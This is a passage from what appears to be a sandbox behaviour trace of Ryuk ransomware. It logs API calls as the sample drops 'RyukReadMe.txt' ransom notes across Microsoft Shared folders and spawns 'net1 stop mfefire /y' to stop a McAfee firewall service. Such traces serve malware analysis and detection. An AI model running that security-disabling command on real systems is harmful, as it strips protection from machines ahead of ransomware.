lpOverlapped=0x0) returned 0 [0161.352] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.352] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-TW\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2ee0 [0161.352] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.352] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.352] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0161.353] SetLastError (dwErrCode=0x0) [0161.353] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-TW\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\zh-tw\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.353] GetLastError () returned 0x5 [0161.353] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0161.353] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.353] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0161.353] SetLastError (dwErrCode=0x0) [0161.353] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.353] GetLastError () returned 0x5 [0161.353] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0161.353] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.353] SetLastError (dwErrCode=0x0) [0161.353] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.353] GetLastError () returned 0x5 [0161.353] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0161.353] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.353] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e80 [0161.354] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0161.354] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0161.354] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0161.354] SetLastError (dwErrCode=0x0) [0161.354] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\msclientdatamgr\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.354] GetLastError () returned 0x5 [0161.354] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0161.354] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.354] SetLastError (dwErrCode=0x0) [0161.354] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.354] GetLastError () returned 0x5 [0161.354] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0161.354] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.354] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e80 [0161.355] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0161.355] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0161.355] SetLastError (dwErrCode=0x0) [0161.355] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\msinfo\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.355] GetLastError () returned 0x5 [0161.355] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0161.355] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.355] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2ee0 [0161.355] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.355] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.355] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0161.355] SetLastError (dwErrCode=0x0) [0161.355] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\msinfo\\en-us\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.355] GetLastError () returned 0x5 [0161.355] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0161.355] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.355] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0161.355] SetLastError (dwErrCode=0x0) [0161.355] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\msinfo\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.356] GetLastError () returned 0x5 [0161.356] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0161.356] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.356] SetLastError (dwErrCode=0x0) [0161.356] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.356] GetLastError () returned 0x5 [0161.356] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0161.356] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.356] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e80 [0161.356] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0161.356] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0161.356] SetLastError (dwErrCode=0x0) [0161.356] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.356] GetLastError () returned 0x5 [0161.356] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0161.356] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.356] FindFirstFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\*.*", lpFindFileData=0x29ac2e0) Thread: id = 1028 os_tid = 0x98c Process: id = "416" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x1abda000" os_pid = "0x10e4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "410" os_parent_pid = "0x126c" cmd_line = "C:\\Windows\\system32\\net1 stop mfefire /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 14626 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 14627 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 14628 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 14629 start_va = 0x150000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 14630 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 14631 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 14632 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 14633 start_va = 0xffec0000 end_va = 0xffef2fff entry_point = 0xffec0000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 14634 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 14635 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 14636 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 14637 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 14639 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 14640 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 14641 start_va = 0x310000 end_va = 0x40ffff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 14642 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 14643 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 14644 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 14645 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 14646 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 14647 start_va = 0x1d0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 14648 start_va = 0x600000 end_va = 0x60ffff entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 14649 start_va = 0x7fef4380000 end_va = 0x7fef4391fff entry_point = 0x7fef4380000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 14650 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 14651 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 14652 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 14653 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 14654 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 14655 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 14656 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 14657 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 14658 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 14659 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 14660 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 14661 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 14662 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 14663 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 14664 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 14715 start_va = 0x75280000 end_va = 0x75281fff entry_point = 0x75280000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 1010 os_tid = 0x10bc [0125.682] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1cfa30 | out: lpSystemTimeAsFileTime=0x1cfa30*(dwLowDateTime=0xffcfc110, dwHighDateTime=0x1d48689)) [0125.682] GetCurrentProcessId () returned 0x10e4 [0125.682] GetCurrentThreadId () returned 0x10bc [0125.682] GetTickCount () returned 0x28f15 [0125.682] QueryPerformanceCounter (in: lpPerformanceCount=0x1cfa38 | out: lpPerformanceCount=0x1cfa38*=1817260000000) returned 1 [0125.683] GetModuleHandleW (lpModuleName=0x0) returned 0xffec0000 [0125.683] __set_app_type (_Type=0x1) [0125.683] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xffed9c9c) returned 0x0 [0125.683] __getmainargs (in: _Argc=0xffee4780, _Argv=0xffee4790, _Env=0xffee4788, _DoWildCard=0, _StartInfo=0xffee479c | out: _Argc=0xffee4780, _Argv=0xffee4790, _Env=0xffee4788) returned 0 [0125.683] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0125.683] GetConsoleOutputCP () returned 0x1b5 [0125.683] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xffeecec0 | out: lpCPInfo=0xffeecec0) returned 1 [0125.683] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0125.685] sprintf_s (in: _DstBuf=0x1cf9d8, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0125.685] setlocale (category=0, locale=".437") returned="English_United States.437" [0125.686] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0125.686] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0125.686] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop mfefire /y" [0125.687] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1cf770, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0125.687] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0125.687] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x1cf9c8 | out: Buffer=0x1cf9c8*=0x324d40) returned 0x0 [0125.687] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x1cf9c8 | out: Buffer=0x1cf9c8*=0x32c0e0) returned 0x0 [0125.687] _fileno (_File=0x7fefdba2a80) returned 0 [0125.687] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0125.687] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0125.687] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0125.687] _wcsicmp (_String1="config", _String2="stop") returned -16 [0125.687] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0125.687] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0125.687] _wcsicmp (_String1="file", _String2="stop") returned -13 [0125.687] _wcsicmp (_String1="files", _String2="stop") returned -13 [0125.687] _wcsicmp (_String1="group", _String2="stop") returned -12 [0125.687] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0125.687] _wcsicmp (_String1="help", _String2="stop") returned -11 [0125.687] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0125.687] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0125.687] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0125.687] _wcsicmp (_String1="session", _String2="stop") returned -15 [0125.687] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0125.687] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0125.687] _wcsicmp (_String1="share", _String2="stop") returned -12 [0125.688] _wcsicmp (_String1="start", _String2="stop") returned -14 [0125.688] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0125.688] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0125.688] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0125.688] _wcsicmp (_String1="accounts", _String2="mfefire") returned -12 [0125.688] _wcsicmp (_String1="computer", _String2="mfefire") returned -10 [0125.688] _wcsicmp (_String1="config", _String2="mfefire") returned -10 [0125.688] _wcsicmp (_String1="continue", _String2="mfefire") returned -10 [0125.688] _wcsicmp (_String1="cont", _String2="mfefire") returned -10 [0125.688] _wcsicmp (_String1="file", _String2="mfefire") returned -7 [0125.688] _wcsicmp (_String1="files", _String2="mfefire") returned -7 [0125.688] _wcsicmp (_String1="group", _String2="mfefire") returned -6 [0125.688] _wcsicmp (_String1="groups", _String2="mfefire") returned -6 [0125.688] _wcsicmp (_String1="help", _String2="mfefire") returned -5 [0125.688] _wcsicmp (_String1="helpmsg", _String2="mfefire") returned -5 [0125.688] _wcsicmp (_String1="localgroup", _String2="mfefire") returned -1 [0125.688] _wcsicmp (_String1="pause", _String2="mfefire") returned 3 [0125.688] _wcsicmp (_String1="session", _String2="mfefire") returned 6 [0125.688] _wcsicmp (_String1="sessions", _String2="mfefire") returned 6 [0125.688] _wcsicmp (_String1="sess", _String2="mfefire") returned 6 [0125.688] _wcsicmp (_String1="share", _String2="mfefire") returned 6 [0125.688] _wcsicmp (_String1="start", _String2="mfefire") returned 6 [0125.688] _wcsicmp (_String1="stats", _String2="mfefire") returned 6 [0125.688] _wcsicmp (_String1="statistics", _String2="mfefire") returned 6 [0125.688] _wcsicmp (_String1="stop", _String2="mfefire") returned 6 [0125.688] _wcsicmp (_String1="time", _String2="mfefire") returned 7 [0125.688] _wcsicmp (_String1="user", _String2="mfefire") returned 8 [0125.688] _wcsicmp (_String1="users", _String2="mfefire") returned 8 [0125.688] _wcsicmp (_String1="msg", _String2="mfefire") returned 13 [0125.688] _wcsicmp (_String1="messenger", _String2="mfefire") returned -1 [0125.688] _wcsicmp (_String1="receiver", _String2="mfefire") returned 5 [0125.688] _wcsicmp (_String1="rcv", _String2="mfefire") returned 5 [0125.688] _wcsicmp (_String1="netpopup", _String2="mfefire") returned 1 [0125.688] _wcsicmp (_String1="redirector", _String2="mfefire") returned 5 [0125.688] _wcsicmp (_String1="redir", _String2="mfefire") returned 5 [0125.689] _wcsicmp (_String1="rdr", _String2="mfefire") returned 5 [0125.689] _wcsicmp (_String1="workstation", _String2="mfefire") returned 10 [0125.689] _wcsicmp (_String1="work", _String2="mfefire") returned 10 [0125.689] _wcsicmp (_String1="wksta", _String2="mfefire") returned 10 [0125.689] _wcsicmp (_String1="prdr", _String2="mfefire") returned 3 [0125.689] _wcsicmp (_String1="devrdr", _String2="mfefire") returned -9 [0125.689] _wcsicmp (_String1="lanmanworkstation", _String2="mfefire") returned -1 [0125.689] _wcsicmp (_String1="server", _String2="mfefire") returned 6 [0125.689] _wcsicmp (_String1="svr", _String2="mfefire") returned 6 [0125.689] _wcsicmp (_String1="srv", _String2="mfefire") returned 6 [0125.689] _wcsicmp (_String1="lanmanserver", _String2="mfefire") returned -1 [0125.689] _wcsicmp (_String1="alerter", _String2="mfefire") returned -12 [0125.689] _wcsicmp (_String1="netlogon", _String2="mfefire") returned 1 [0125.689] _wcsupr (in: _String="mfefire" | out: _String="MFEFIRE") returned="MFEFIRE" [0125.689] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x32cdf0 [0125.693] GetServiceKeyNameW (in: hSCManager=0x32cdf0, lpDisplayName="MFEFIRE", lpServiceName=0xffee5750, lpcchBuffer=0x1cf8e8 | out: lpServiceName="", lpcchBuffer=0x1cf8e8) returned 0 [0125.876] _wcsicmp (_String1="msg", _String2="MFEFIRE") returned 13 [0125.876] _wcsicmp (_String1="messenger", _String2="MFEFIRE") returned -1 [0125.876] _wcsicmp (_String1="receiver", _String2="MFEFIRE") returned 5 [0125.876] _wcsicmp (_String1="rcv", _String2="MFEFIRE") returned 5 [0125.876] _wcsicmp (_String1="redirector", _String2="MFEFIRE") returned 5 [0125.876] _wcsicmp (_String1="redir", _String2="MFEFIRE") returned 5 [0125.876] _wcsicmp (_String1="rdr", _String2="MFEFIRE") returned 5 [0125.876] _wcsicmp (_String1="workstation", _String2="MFEFIRE") returned 10 [0125.876] _wcsicmp (_String1="work", _String2="MFEFIRE") returned 10 [0125.876] _wcsicmp (_String1="wksta", _String2="MFEFIRE") returned 10 [0125.876] _wcsicmp (_String1="prdr", _String2="MFEFIRE") returned 3 [0125.876] _wcsicmp (_String1="devrdr", _String2="MFEFIRE") returned -9 [0125.876] _wcsicmp (_String1="lanmanworkstation", _String2="MFEFIRE") returned -1 [0125.876] _wcsicmp (_String1="server", _String2="MFEFIRE") returned 6 [0125.876] _wcsicmp (_String1="svr", _String2="MFEFIRE") returned 6 [0125.876] _wcsicmp (_String1="srv", _String2="MFEFIRE") returned 6 [0125.876] _wcsicmp (_String1="lanmanserver", _String2="MFEFIRE") returned -1 [0125.876] _wcsicmp (_String1="alerter", _String2="MFEFIRE") returned -12 [0125.876] _wcsicmp (_String1="netlogon", _String2="MFEFIRE") returned 1 [0125.876] NetServiceControl (in: servername=0x0, service="MFEFIRE", opcode=0x0, arg=0x0, bufptr=0x1cf8f0 | out: bufptr=0x1cf8f0) returned 0x889 [0125.877] wcscpy_s (in: _Destination=0xffee80d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0125.877] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75280000 [0125.878] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75280000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xffee5b50, nSize=0x800, Arguments=0xffee7f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0125.879] 